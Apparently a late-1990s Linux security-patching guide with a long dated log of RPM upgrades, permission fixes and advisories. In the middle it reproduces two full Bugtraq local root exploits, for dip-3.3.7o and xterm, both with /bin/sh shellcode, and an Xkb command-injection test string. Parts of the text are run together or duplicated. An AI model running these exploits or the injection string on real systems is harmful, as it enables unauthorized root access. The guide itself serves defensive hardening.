All users should apply patches to their respective Linux installation:
1. upon the first time the machine is installed
2. at least every week after that to stay ontop of the newest bug and security fixes
To find out what are the current security issues with Linux, etc, check out the Security URLs in Section 5
--- --- ---
NOTE: This is where Redhat RPMs, and Debian upgrade files really shine and blow away Slackware .PKG files!
NOTE #2: Be careful of where you download your newer versions of source code, RPMs, etc. Recently, ftp://win.tue.nl was hacked and the hackers put trojan'ed versions of TCP-wrappers and Linux-utils on their site. Because of this, many user's passwords were sent to the hacker's email address, etc. Not good.
In the future, I will cover how to verify the package's authenticity with PGP.
Redhat users: Depending on when you purchased your CD, your CD might already have these RPMs installed so if it says the RPM is already installed, just skip it.
************************* ** Be cautious with RPMs ** Before you blindly start installing new patch RPMs or even new software in RPM form, you really should (quickly) inspect the RPM archive to make sure it looks ok. For example, lets say you are going to install a new Sendmail RPM:
First, download the new Sendmail RPM file and put it to some location for future reference. I personally put all files in /usr/src/archive as described in the top of Section 5
Now show the RPM creator's notes:
rpm -qip sendmail-*.i386.rpm
Show the RPM's file contents:
rpm -qlp sendmail-*.i386.rpm | more
- Next, if you already have an older Sendmail RPM installed, make sure that the new RPMs won't clober your old configuration files:
rpm -Uv --test sendmail-*.i386.rpm
For even more info (I'd recommend it), do:
rpm -Uvv --test sendmail-*.i386.rpm
- With a little cautious looking, you'll know what will happen if you install this new RPM. Ok?
If the new Sendmail installation is going to copy over your original files, the RPM will -usually- make a backup of your configuration files and add a ".rpmsave" to it.
*** ******************************
Redhat users #2: I have noticed that the "rpm" program will crash (coredump) about 60% of the way through a wildcard (*.rpm) RPM upgrade process. You should be able to safely figure out what patches it failed to install and do them manually or by doing the following:
Say that the RPM program died while doing patching in the letter range (Q). So, do this to install all patches from Q to Z.
"rpm -Uvh [q-zQ-Z].rpm
************************ ** Patching your Redhat system ** Now, to find out if any new RPM files exist for Redhat, go to http://www.redhat.com/support/docs/errata.html and then look at the upper right-hand corner's date. If this date is NEWER than the 00readme.errata file, then there are newer RPMs.
Their documentation system read SUCKS in terms of though there might be a NEWER RPM for Glibc, they mearly update the DATE in the previous Gblic errata entry. Lame eh? So, you will have to page though the different errata listing to find what newer-date entries have been added.
*** ******************************
---- Various RPMs, permission fixes, etc...
- Fix BRU if it is installed:
chmod 1777 /usr/local/lib/bru (assuming root login)
or My /usr/local/lib/bru directory is 775, works fine (as expected) from root. great Security URLS: ftp://ftp.win.tue.nl/pub/security sendmail: 8.8.6.1 KSR[T] Advisory #003 Date: Aug 05, 1997 ID #: lin-cron-003 Operating System(s): Redhat linux 4.1, SuSE Linux 5.0, Slackware 3.3 Affected Program: updatedb / crontabs Syn Attack logs: http://www.whitefang.com/synlog.html IP filtering: ftp://ietf.org/internet-drafts/draft-ferguson-ingress-filtering-03.txt CRON exploit: ftp://ftp.freesoftware.com/pub/linux/slackware-3.4/slakware/a2/bin.tgz psaux: The Quick fix: chmod 660 /dev/psaux 2/9/98: Xkb 1. as usual chmod u-s,g-s all installed Xserver binaries (*) Quick vulnerability check $ Xserver -xkbdir ':;id > /tmp/I_WAS_HERE;' [exit X server] $ grep root /tmp/I_WAS_HERE && echo 'Gotcha!' * remove setuid/setgid bit from all installed Xservers * use xdm or a safe setuid wrapper to start Xserver 2/9/98: Device Dos ls -l /dev/* | grep "r-- " chmod ;) 2/9/98: Upgrade to ld.so v1.9.5 or better.. 2/9/98: The patch corrects the coredump error in both imapd and ipop3d (the pine version of pop3 server). Patch is against pine 3.96 diff -ru log_lnx.c.orig log_lnx.c --- log_lnx.c.orig Tue May 2 00:08:20 1995 +++ log_lnx.c Thu Feb 5 08:49:31 1998 @@ -55,7 +55,8 @@ /* allow case-independent match */ if (!pw) pw = getpwnam (lcase (strcpy (tmp,user))); /* no entry for this user or root */ - if (!(pw && pw->pw_uid)) return NIL; + if (!(pw)) return NIL; + if (!(pw->pw_uid)) return NIL; if(!(spw = getspnam (pw->pw_name))) return NIL; /* validate password */ if (strcmp (spw->sp_pwdp,(char *) pw_encrypt(pass,spw->sp_pwdp))) return NIL; 2/9/98 chmod 700 /dev/zero Date: Fri, 6 Feb 1998 07:59:46 +0100 2/9/98 Xconfigurator issue (if installed) chmod 700 Xconfigurator Date: Fri, 6 Feb 1998 07:59:46 +0100 2/9/98 Remove all old versions of /lib/libc.so.x 2/9/98 Upgrade linux-ld.so.x 4/6/98 Security "chmod 700" the following files: /tmp overwrite exploit /sbin/Liloconfig (already good permissions) /sbin/pkgtool.tty and /usr/lib/setup.cpkgtool (fixed) /sbin/makebootdisk (fixed) /sbin/netconfig.tty and netconfig.color (fixed) 4/19/98: Here is a patch for the "Off by one IP header bug. Put the following into a file (ie: offbyone.patch) in /usr/src/linux and apply it by running "patch -p1 < offbyone.patch". [This is FIXED in 2.0.35] --<begin>-- --- ip_fragment.c.old Thu Apr 16 12:25:34 1998 +++ ip_fragment.c Thu Apr 16 12:29:02 1998 @@ -375,7 +375,7 @@ fp = qp->fragments; while(fp != NULL) { - if (fp->len < 0 || count+fp->len > skb->len) + if (fp->len < 0 || fp->offset+qp->ihlen+fp->len > skb->len) { NETDEBUG(printk("Invalid fragment list: Fragment over size.\n")); ip_free(qp); --<end>-- Now, re-compile the kernel, move the kernel to /boot, update the /etc/lilo.conf file, re-run "lilo", and reboot. 4/22/98: [linux-security] SECURITY: procps 1.2.7 fixes security hole 5/8/98: Dip and Xterm exploits: The following code causes a buffer overrun in dip-3.3.7o that comes with linux slakware version 3.4 and maybe others. It can give you root permission if dip file is owned by root and set-user-id bit is set. This problem was mentioned in this list some days ago by Goran Gajic, and he has also posted some possible ways to correct it. The code is too messy... but it works. Regards, zef ------------------------------ dipr.c ----------------------------- /* * dip-3.3.7o buffer overrun 07 May 1998 * * sintax: ./dipr <offset> * * * offset: try increments of 50 between 1500 and 3000 * * tested in linux with dip version 3.3.7o (slak 3.4). * * by zef and r00t @promisc.net * * http://www.promisc.net */ #include <stdio.h> #include <stdlib.h> static inline getesp() { __asm__(" movl %esp,%eax "); } main(int argc, char **argv) { int jump,i,n; unsigned long xaddr; char *cmd[5], buf[4096]; char code[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; jump=atoi(argv[1]); for (i=0;i<68;i++) buf[i]=0x41; for (n=0,i=68;i<113;i++) buf[i]=code[n++]; xaddr=getesp()+jump; buf[i]=xaddr & 0xff; buf[i+1]=(xaddr >> 8) & 0xff; buf[i+2]=(xaddr >> 16) & 0xff; buf[i+3]=(xaddr >> 24) & 0xff; buf[i+4]=xaddr & 0xff; buf[i+5]=(xaddr >> 8) & 0xff; buf[i+6]=(xaddr >> 16) & 0xff; buf[i+6]=(xaddr >> 16) & 0xff; buf[i+7]=(xaddr >> 24) & 0xff; cmd[0]=malloc(17); strcpy(cmd[0],"/sbin/dip-3.3.7o"); cmd[1]=malloc(3); strcpy(cmd[1],"-k"); cmd[2]=malloc(3); strcpy(cmd[2],"-l"); cmd[3]=buf; cmd[4]=NULL; execve(cmd[0],cmd,NULL); } ------------------------------- end ------------------------------- Shell script for easy testing :-) ---------------------------- dipr.test ---------------------------- #/bin/bash if [ ! -x /sbin/dip-3.3.7o ] then echo "could not find file \"/sbin/dip-3.3.7o\""; exit -1 fi if [ ! -u /sbin/dip-3.3.7o ] then echo "dip executable is not suid" exit -1 fi if [ ! -x ./dipr ] then echo "could not find file \"./dipr\""; echo "try compiling dipr.c" exit -1 fi x=2000 false while [ $x -lt 3000 -a $? -ne 0 ] fi if [ ! -u /sbin/dip-3.3.7o ] then echo "dip executable is not suid" exit -1 fi if [ ! -x ./dipr ] then echo "could not find file \"./dipr\""; echo "try compiling dipr.c" exit -1 fi x=2000 false while [ $x -lt 3000 -a $? -ne 0 ] do echo offset=$x x=$[x+50] ./dipr $x done rm -f core ------------------------------- end ------------------------------- Approved-By: aleph1@NATIONWIDE.NET X-Sender: andrea@dragon.bogus X-Public-Key-URL: http://www-linux.deis.unibo.it/~mirror/aa.asc Date: Fri, 8 May 1998 16:50:05 +0200 Reply-To: Andrea Arcangeli <arcangeli@MBOX.QUEEN.IT> Sender: Bugtraq List <BUGTRAQ@NETSPACE.ORG> From: Andrea Arcangeli <arcangeli@MBOX.QUEEN.IT> Subject: xterm exploit [TOG issue] To: BUGTRAQ@NETSPACE.ORG /* xterm_exp.c : linux/x86 xterm.Xaw exploit by alcuin - 5/4/98 - [ http://www.rootshell.com/ ] It works against both Xaw and neXtaw widgets NB: you have to cp ~/.Xdefaults.old ~/.Xdefaults to be able to use xterm again. */ #include <stdlib.h> #include <stdio.h> #include <ctype.h> unsigned int getsp() { asm("mov %esp,%eax"); } inline rootshell(){ __asm__( "movb $0x56, %al\n\t" "l1:cmpb $0x12, %al\n\t" "je l2\n\t" "movb $0x12,%al\n\t" "call l1\n\t" "l2:pop %esi\n\t" "xorl %eax,%eax\n\t" "movb $0x25, %al\n\t" "addl %eax,%esi\n\t" "movl %esi,%ebx\n\t" "movl %esi,%edi\n\t" "movb $8,%al\n\t" "addl %eax,%edi\n\t" "movb $5,%al\n\t" "addl %eax,%esi\n\t" "movl %esi,(%edi)\n\t" "movl %edi,%ecx\n\t" "incl %edi\n\t" "incl %edi\n\t" "incl %edi\n\t" "incl %edi\n\t" "xorb %al,%al\n\t" "movl %eax,(%edi)\n\t" "movl %edi,%edx\n\t" "movb $0xb,%al\n\t" "int $0x80\n\t" ".string \"/bin/sh\"\n" ); } #define CONFFILE ".Xdefaults" #define OLDFILE ".Xdefaults.old" #define NEWFILE ".Xdefaults.new" main (int argc, char **argv) { char *home; FILE *f_in, *f_out; char buf[16384]; char shellbuf[16384]; char *s; int i; unsigned int sp=getsp(); if (home = getenv("HOME")) chdir(home); if (!(f_out = fopen(NEWFILE, "w"))) { perror("fopen"); exit(1); } if (f_in = fopen(CONFFILE, "r")) { fseek(f_in,0,SEEK_SET); while (!feof(f_in)) { fgets(buf,16384,f_in); for (s=buf;isblank(*s);s++); if (strncmp(s,"xterm*inputMethod",17)<0) fputs(buf,f_out); } fclose(f_in); } /* fill the buffer with nops */ memset(shellbuf, 0x90, sizeof(shellbuf)); shellbuf[sizeof(shellbuf)-1] = 0; /* write the return adress */ s = shellbuf+2052; *(int *)s=sp+0x69F5; /* write the root shell code */ s = shellbuf+2800; strcpy(s,(char*)rootshell); fputs("xterm*inputMethod:",f_out); fputs(shellbuf, f_out); fclose(f_out); system("/bin/cp "CONFFILE" "OLDFILE); system("/bin/mv -f "NEWFILE" "CONFFILE); execl("/usr/X11R6/bin/xterm","xterm",NULL); } I can' t reproduce the problem with the latest Debian compiled XFree86: andrea@dragon:~$ dpkg -l xbase Desired=Unknown/Install/Remove/Purge | Status=Not/Installed/Config-files/Unpacked/Failed-config/Half-installed |/ Err?=(none)/Hold/Reinst-required/X=both-problems (Status,Err: uppercase=bad) ||/ Name Version Description +++-===============-==============-============================================ ii xbase 3.3.2-4 local clients and configuration required by Andrea[s] Arcangeli ---- ======================================================================= See the updated master RPM guide at the TOP of this section ======================================================================= Applied the following patches on 5/30/98: rpm -Uvh --force --nodeps rpm-2.5.1-1.i386.rpm rpm -Uvh glibc-2.0.7-13.i386.rpm rpm -Uvh glibc-devel-2.0.7-13.i386.rpm Applied the following on 6/1/98 to fix the --nodep issue: rpm -Uvh patch-2.5.2.i386.rpm 6/13/98 - SSH 1.2.25 update. There is a new SSH exploit that requires that users upgrade to 1.2.25 ASAP!!!! See the SSH chapter, section 29, for URLs. 6/15/98 - installed bootp, metamail, dhcpcd, minicom, dhcp, xscreensaver, findutils, X11, mailx RPMS 6/20/98 - Changed permissions of /usr/bin/lpr to (chmod 700 /usr/bin/lpr) due to some security issues. 7/1/98 - Changed the permissions of /usr/X11R6/bin/seyon to (chmod 700) due to security issues 7/4/09 - implemented the new RPMs for: slang libtermcap rpm I *SKIPPED* the Tin upgrade since I installed Tin v1.4beta. I *SKIPPED* the Bind v4.9.x upgrade since I'm running Bind 8.1.2T3 7/8/98 - implemented the new dosemu-0.66.7-7.i386.rpm and libtermcap-2.0.8-9.i386.rpm fixes. 7/13/98 - implemented the new samba-1.9.18p7-2.i386.rpm RPM due to security issues 7/14/98 - Just after Pine 4.00 was released, we were made aware of a security problem with the imapd server that is included in the Pine 4.00 distribution. This will be fixed in the Pine 4.01 maintenance release, but in the mean time, if you are using the UW IMAP server, please update it with the following distribution: ftp://ftp.cac.washington.edu/mail/imap.tar.Z We don't have new imapd binaries available yet. Pine itself is not affected. 7/28/98 - implemented the following RPMs: NOTE: Upon installation of the initscripts RPM, you will need to re-do ALL network optimizations from [Section 16] + ncurses-1.9.9e-9.i386.rpm + ncurses-devel-1.9.9e-9.i386.rpm + imap-4.1.final-1.i386.rpm (installed the RPM though TrinityOS disables IMAP) + elm-2.4.25-14.i386.rpm + glibc-2.0.7-19.i386.rpm + glibc-debug-2.0.7-19.i386.rpm + glibc-devel-2.0.7-19.i386.rpm + glibc-profile-2.0.7-19.i386.rpm + Xconfigurator-3.26.1-1.i386.rpm + initscripts-3.67-1.i386.rpm This RPM changes the following files but it makes backups of your old files: /etc/ppp/ip-up /etc/rc.d/rc.sysinit /sbin/ifup + modutils-2.1.85-4.i386.rpm + findutils-4.1-24.i386.rpm - Removed SUID bit from the /usr/bin/dumpreg program due to a kernel crash issue chmod 755 /usr/bin/dumpreg 8/8/98 - implemented the following RPMs: + mutt-0.91.1-5.i386.rpm + SysVinit-2.74-4.i386.rpm 8/11/98 - implemented the apache-1.2.6-5.i386.rpm RPM NOTE: If you are NOT using apache yet but still installed the RPM, you will start getting Log Rotate errors. To fix this, do the following: mkdir /etc/logrotate.d.disabled mv /etc/logrotate.d/apache /etc/logrotate.d.disabled/apache 8/17/98 - implemented the svgalib-1.2.13-5.i386.rpm to fix a console DoS. 8/22/98 - implemented the LinuxConf linuxconf-1.11r19-1.i386.rpm RPM to fix a /tmp DoS hack for Redhat 5.1+ distributions 8/28/98 - implemented the nfs-server-2.2beta29-7.i386.rpm and nfs-server-clients-2.2beta29-7.i386.rpm patches to fix NFS (again..) 8/31/98 - There is a buffer overflow DoS attack on Minicom, to fix this, run "chmod 700 /usr/sbin/minicom" 9/20/98 - Installed the xscreensaver-2.27-1.i386.rpm to fix core dumps with xlyap 10/10/98 - De-installed the following tools: rpm -e fstool usercfg cabaret I have also installed several other RPMs from Redhat's update page. Please follow 10/31/98 - Installed 5.0 RPMS + bash-1.14.7-11.i386.rpm + imap-4.1.final-1.i386.rpm + netscape-navigator-4.06-2.i386.rpm + nfs-server-2.2beta29-7.i386.rpm + nfs-server-clients-2.2beta29-7.i386.rpm + pcmcia-cs-2.9.12-3.i386.rpm + rpm-2.5.3-5.0.i386.rpm + rpm-devel-2.5.3-5.0.i386.rpm + xscreensaver-2.27-1.i386.rpm 5.1 RPMs + fetchmail-4.5.3-1.i386.rpm + glint-2.6.1-1.i386.rpm + ispell-3.1.20-9.i386.rpm + man-1.5d-3.i386.rpm + xosview-1.5.1-4.i386.rpm 11/05/98 - Installed + svgalib-1.2.13-6.i386.rpm + svgalib-devel-1.2.13-6.i386.rpm + zgv-3.0-0.5.0.i386.rpm 11/13/98 - Installed + libc-5.3.12-28.i386.rpm 11/15/98 - Installed: + sysklogd-1.3-26.i386.rpm + samba-1.9.18p10-5.i386.rpm 12/01/98 - Disabled RZ and SZ due to the fact that LRZ creates files of 0666 though the UMASK might be different. chmod 700 /usr/bin/lrz chmod 700 /usr/bin/lsz 12/17/98 - Added updated RPMs for issues with Netscape, FTP, Xwindows netscape-common-4.08-1.i386.rpm netscape-communicator-4.08-1.i386.rpm netscape-navigator-4.08-1.i386.rpm ftp-0.10-4.i386.rpm XFree86-libs-3.3.3-1.i386.rpm XFree86-3.3.3-1.i386.rpm 12/29/98 - Added 1 RPM pam-0.64-4.i386.rpm 02/10/99 - Added 1 RPM to fix a root-compromise FTP bug ftp://updates.redhat.com/5.2/i386/wu-ftpd-2.4.2b18-2.1.i386.rpm NOTE: Though not included with Slackware or Redhat, ProFTPd which comes with Debian Linux is vulnerable too. Upgrade to version 1.2.0pre1-2 or better. 02/11/99 - There is a Lynx /tmp race and ALL versions of Lynx less than v2.8.1 are vulnerable. Until you update your Lynx code, DISABLE it: chmod 700 /usr/bin/lynx 02/15/99 - The "Super" program, similar to "su" on Debian Linux has a root exploit. Upgrate to at least v3.11.7. ftp.onshore.com:/pub/mirror/software/super 02/17/99 - There is a root exploit against /usr/sbin/lsof. Change its permissions to 0755 02/19/99 - Installed the lsof-4.40-1.i386.rpm to fix the security issue announced on 2/17/99 - Debian has released the super_3.11.7-1.deb patch to fix the security issues announced on 02/15/99 02/21/99 - Zgv has another exploit. Because of this, I recommend to make it only root executable: chmod 0500 /usr/bin/zgv 03/05/99 - There is a root exploit for GNUplot on SuSe distributions. For some reason, SuSe installed this program SUID root. Fix this: chmod 755 /usr/bin/gnuplot 03/20/99 - There is a security vunderability in Netscape 4.5.0's "talkback". Netscape 4.51 has removed talkback . Change its permissions via "/bin/chmod -R 600 /opt/netscape/talkback" 03/20/99 - There is a SuSE security issue with /proc/kmem Change its permissions "/bin/chmod 640 /dev/kmem" 03/28/99 - There is a /tmp race condition that can overwrite files. Until there is a new Xfree version posted, do the following: /bin/rm -rf /tmp/.X11-unix mkdir -p -m 1777 /tmp/.X11-unix 03/30/99 - There are are (4) new patches for Redhat but (2) of them are dependant on the version of Redhat. mutt-0.95.4us-0.i386.rpm pine-3.96-7.1.i386.rpm sysklogd-1.3.31-0.5.i386.rpm zgv-3.0-1.5.0.i386.rpm NOTE: There is a small bug with the sysklogd rpm. Please see ChangeLog date 4/12/99 for more details. 04/19/99 - Installed (3) new RPMs for security reasons: lpr-0.35-0.5.2.i386.rpm procmail-3.13.1-1.i386.rpm rsync-2.3.1-0.i386.rpm 05/03/99 - Older versions of Caldera might make the /etc/shadow file world readable. Update your Coas tool to coas-1.0-8.i386.rpm 05/05/99 - There is a new Bugtraq exploit for Wu-FTP v2.4.2-Beta18 and below called "W00f". Redhat hasn't released a new wu-ftp version so you'll need to install it yourself! ftp://ftp.vr.net/pub/wu-ftpd/binaries/intel/linux/wu-ftpd-2.4.2-vr17-1.i386.rpm 06/1/99 - There is a Y2K issue with Timetool: ftp://updates.redhat.com/5.2/noarch/timetool-2.5-4.noarch.rpm - There is a problem with the newest Apache module for Perl CGIs ftp://updates.redhat.com/5.2/i386/mod_perl-1.19-1.i386.rpm 6/04/99 - Redhat has updated their kernels in RH6.0 for a DoS issue. ftp://updates.redhat.com/6.0/i386/kernel-2.2.5-22.i386.rpm 6/12/99 - Redhat has a new patch for RH6 to monitor stray processes ftp://updates.redhat.com/6.0/i386/utempter-0.5-2.i386.rpm - More fixes for the POP-3 protocol: ftp://updates.redhat.com/5.2/i386/imap-4.5-0.5.2.i386.rpm 6/18/99 - Redhat released some patches for security issues with some terminal progs on RH6. dev-2.7.7-2.i386.rpm rxvt-2.6.0-2.i386.rpm screen-3.7.6-9.i386.rpm - Redhat also has updated their entire Xwindow package for problem fixes for the font server, race conditions, ISO-8859 char conflicts, No Xauth authentication (ack!), and backspace keymapping issues: XFree86-3.3.3.1-52.i386.rpm, XFree86-100dpi-fonts-3.3.3.1-52.i386.rpm XFree86-75dpi-fonts-3.3.3.1-52.i386.rpm, XFree86-3DLabs-3.3.3.1-52.i386.rpm XFree86-8514-3.3.3.1-52.i386.rpm, XFree86-AGX-3.3.3.1-52.i386.rpm XFree86-FBDev-3.3.3.1-52.i386.rpm, XFree86-I128-3.3.3.1-52.i386.rpm XFree86-Mach32-3.3.3.1-52.i386.rpm, XFree86-Mach64-3.3.3.1-52.i386.rpm XFree86-Mach8-3.3.3.1-52.i386.rpm, XFree86-Mono-3.3.3.1-52.i386.rpm XFree86-P9000-3.3.3.1-52.i386.rpm, XFree86-S3-3.3.3.1-52.i386.rpm XFree86-S3V-3.3.3.1-52.i386.rpm, XFree86-SVGA-3.3.3.1-52.i386.rpm XFree86-VGA16-3.3.3.1-52.i386.rpm, XFree86-W32-3.3.3.1-52.i386.rpm XFree86-XF86Setup-3.3.3.1-52.i386.rpm, XFree86-Xnest-3.3.3.1-52.i386.rpm XFree86-Xvfb-3.3.3.1-52.i386.rpm, XFree86-cyrillic-fonts-3.3.3.1-52.i386.rpm XFree86-devel-3.3.3.1-52.i386.rpm, XFree86-doc-3.3.3.1-52.i386.rpm XFree86-libs-3.3.3.1-52.i386.rpm, XFree86-xfs-3.3.3.1-52.i386.rpm 6/23/99 - Redhat has released a new patch set for KDE on RH6 to bring it to release levels and it also fixes some security issues: Intel: ftp://updates.redhat.com/6.0/i386/ kdeadmin-1.1.1-1.i386.rpm, kdebase-1.1.1-1.i386.rpm, kdegames-1.1.1-1.i386.rpm kdegraphics-1.1.1-1.i386.rpm, kdelibs-1.1.1-1.i386.rpm, kdemultimedia-1.1.1-1.i386.rpm kdenetwork-1.1.1-1.i386.rpm, kdesupport-1.1.1-1.i386.rpm, kdetoys-1.1.1-1.i386.rpm kdeutils-1.1.1-1.i386.rpm, korganizer-1.1.1.i386.rpm - Redhat has release new PHP modules for the Apache WWW server: Intel: ftp://updates.redhat.com/6.0/i386/ mod_php3-3.0.9-1.i386.rpm, mod_php3-imap-3.0.9-1.i386.rpm, mod_php3-manual-3.0.9-1.i386.rpm mod_php3-pgsql-3.0.9-1.i386.rpm 6/24/99 Redhat has released a new set of NFS server and client fixes. nfs-server-2.2beta44.i386.rpm, nfs-server-clients2.2beta44.i386.rpm Redhat has released a new nettools patch to fix security issues: ftp://updates.redhat.com/6.0/i386/net-tools-1.52-2.i386.rpm Redhat has released a new version of Talk to fix issues that they broke in RH6 ftp://updates.redhat.com/6.0/i386/talk-0.11-2.i386.rpm Ack! This is a huge gap eh? 11/15/99 - There is a ROOT exploit against ALL versions of NAMED less than 8.2.2p5. Upgrade your BIND DNS server NOW! 11/19/99 - Added a Buffer overflow fix for NFS nfs-server-2.2beta47-1.i386.rpm nfs-server-clients-2.2beta47-1.i386.rpm - Denial of service attack in syslogd sysklogd-1.3.31-1.5.i386.rpm 12/09/99 - Debian reports a root overflow in htdig which is installed in v2.1 of the distribution. 01/17/00 - Added (4) RPMs for security Redhat 6.x: pam-0.68-10.i386.rpm sharutils-4.2.1-1.6.1.i386.rpm usermode-1.18-1.i386.rpm All Redhat: lpr-0.48-0.5.2.i386.rpm